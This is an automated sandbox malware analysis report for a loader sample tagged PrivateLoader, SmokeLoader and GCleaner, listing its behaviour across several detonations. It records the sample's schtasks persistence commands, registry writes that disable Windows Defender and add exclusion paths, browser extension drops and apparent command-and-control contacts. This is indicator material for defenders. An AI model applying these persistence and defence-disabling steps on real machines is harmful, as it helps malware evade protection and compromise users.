Malware Analysis Report

2024-11-15 09:02

Sample ID 241111-jzcw5swgjd
Target 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
SHA256 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5
Tags
loader vmprotect privateloader discovery gcleaner defense_evasion evasion execution spyware stealer trojan persistence smokeloader backdoor
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5

Threat Level: Known bad

The file 4c1fc6a16f378978da7c35f36525a4397a983255020fb709d0ad8cbe3f1e38e5 was found to be: Known bad.

Malicious Activity Summary

loader vmprotect privateloader discovery gcleaner defense_evasion evasion execution spyware stealer trojan persistence smokeloader backdoor

Windows security bypass

Smokeloader family

Gcleaner family

Modifies Windows Defender Real-time Protection settings

GCleaner

SmokeLoader

Privateloader family

Command and Scripting Interpreter: PowerShell

Blocklisted process makes network request

Reads user/profile data of web browsers

Checks BIOS information in registry

Executes dropped EXE

Loads dropped DLL

Indirect Command Execution

Checks computer location settings

VMProtect packed file

Adds Run key to start application

Drops desktop.ini file(s)

Checks installed software on the system

Drops Chrome extension

Legitimate hosting services abused for malware hosting/C2

Suspicious use of SetThreadContext

Enumerates processes with tasklist

Drops file in System32 directory

Drops file in Windows directory

Drops file in Program Files directory

Unsigned PE

Enumerates physical storage devices

Program crash

System Network Configuration Discovery: Internet Connection Discovery

System Location Discovery: System Language Discovery

Runs ping.exe

Suspicious behavior: GetForegroundWindowSpam

Enumerates system info in registry

Scheduled Task/Job: Scheduled Task

Checks SCSI registry key(s)

Modifies data under HKEY_USERS

Suspicious behavior: EnumeratesProcesses

Suspicious use of FindShellTrayWindow

Suspicious use of WriteProcessMemory

Suspicious use of SendNotifyMessage

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-11-11 08:06

Signatures

Privateloader family

privateloader

VMProtect packed file

vmprotect
Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

121s

Max time network

122s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

Signatures

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\PL\Service.exe N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\PL\Service.exe

"C:\Users\Admin\AppData\Local\Temp\PL\Service.exe"

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST

Network

Country Destination Domain Proto
US 8.8.8.8:53 telegram.org udp
NL 149.154.167.99:443 telegram.org tcp
NL 149.154.167.99:443 telegram.org tcp
US 8.8.8.8:53 twitter.com udp
US 104.244.42.129:443 twitter.com tcp
US 104.244.42.129:443 twitter.com tcp
US 8.8.8.8:53 yandex.ru udp
RU 5.255.255.77:443 yandex.ru tcp
US 8.8.8.8:53 dzen.ru udp
RU 62.217.160.2:443 dzen.ru tcp
US 8.8.8.8:53 sso.passport.yandex.ru udp
RU 93.158.134.144:443 sso.passport.yandex.ru tcp
FI 163.123.143.4:80 163.123.143.4 tcp
NL 107.182.129.251:80 107.182.129.251 tcp
US 8.8.8.8:53 pastebin.com udp
US 104.20.4.235:443 pastebin.com tcp
US 8.8.8.8:53 wfsdragon.ru udp
US 104.21.5.208:80 wfsdragon.ru tcp
US 8.8.8.8:53 softs-portal.com udp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
FI 163.123.143.12:80 163.123.143.12 tcp
US 8.8.8.8:53 vipsofts.xyz udp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win10v2004-20241007-en

Max time kernel

150s

Max time network

154s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Processes

C:\Users\Admin\AppData\Local\Temp\PL\setup.exe

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 620

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 536 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 880

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 420 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 900

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 972

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 424 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1048

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 532 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 1148

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 360 -p 4348 -ip 4348

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4348 -s 884

Network

Country Destination Domain Proto
US 8.8.8.8:53 232.168.11.51.in-addr.arpa udp
US 8.8.8.8:53 88.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 56.163.245.4.in-addr.arpa udp
US 8.8.8.8:53 15.164.165.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 83.210.23.2.in-addr.arpa udp
US 8.8.8.8:53 19.229.111.52.in-addr.arpa udp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 208.67.104.97:80 tcp
US 8.8.8.8:53 170.117.168.52.in-addr.arpa udp

Files

memory/4348-1-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/4348-2-0x0000000000470000-0x00000000004AF000-memory.dmp

memory/4348-3-0x0000000000400000-0x0000000000443000-memory.dmp

memory/4348-4-0x00000000006A0000-0x00000000007A0000-memory.dmp

memory/4348-5-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4348-6-0x0000000000470000-0x00000000004AF000-memory.dmp

memory/4348-7-0x0000000000400000-0x0000000000443000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-11 08:05

Reported

2024-11-11 08:08

Platform

win7-20240903-en

Max time kernel

117s

Max time network

119s

Command Line

"C:\Users\Admin\AppData\Local\Temp\PL\setup.exe"

Signatures

Modifies Windows Defender Real-time Protection settings

evasion trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" C:\Windows\SysWOW64\reg.exe N/A

Windows security bypass

evasion trojan
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\LsajhStaXkJRC = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\biwNYXhGTKCQxjLv = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\QpigBxJgKxUn = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\oWxSecJNU = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\eiYaNjTCbhfbMeVB = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\YNUWFfCEdUiU2 = "0" C:\Windows\SysWOW64\reg.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR = "0" C:\Windows\SysWOW64\reg.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths C:\Windows\SysWOW64\reg.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Indirect Command Execution

defense_evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A
N/A N/A C:\Windows\SysWOW64\forfiles.exe N/A

Reads user/profile data of web browsers

spyware stealer

Checks installed software on the system

discovery

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\4FA45AE1010E09657982D8D28B3BD38E_97769FA94627046053C91C794A3C7311 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\05DDC6AA91765AACACDB0A5F96DF8199 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat C:\Windows\SysWOW64\rundll32.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B3513D73A177A2707D910183759B389B_CD08734C3F770C014F2620E6CA4CE9C7 C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
File created C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\eWqHNOqEACgsG.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\GZdYLkX.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\oKUMcOv.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\QpigBxJgKxUn\hgzqaRK.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\WHOECs.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\oWxSecJNU\HhZjtHf.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\YNUWFfCEdUiU2\jVrfOkL.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\ZRxaODbjXejAAfVsBUR\bXCdNnQ.dll C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A
File created C:\Program Files (x86)\LsajhStaXkJRC\LvsQWsQ.xml C:\Windows\Temp\biwNYXhGTKCQxjLv\FYNLXMILBnPjHKv\SrIkAST.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\FTlmQXMDCFpnewAuq.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\zeLHdclAQOoTZxj.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\dBpreMcpfXbehynYz.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\Tasks\bJbhxhmwQPPePEjnjA.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\7zSEF5E.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\alLGALgTRSblXywJD\nzjBlZvpbSzibxG\iWPKQQk.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\schtasks.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\reg.exe N/A
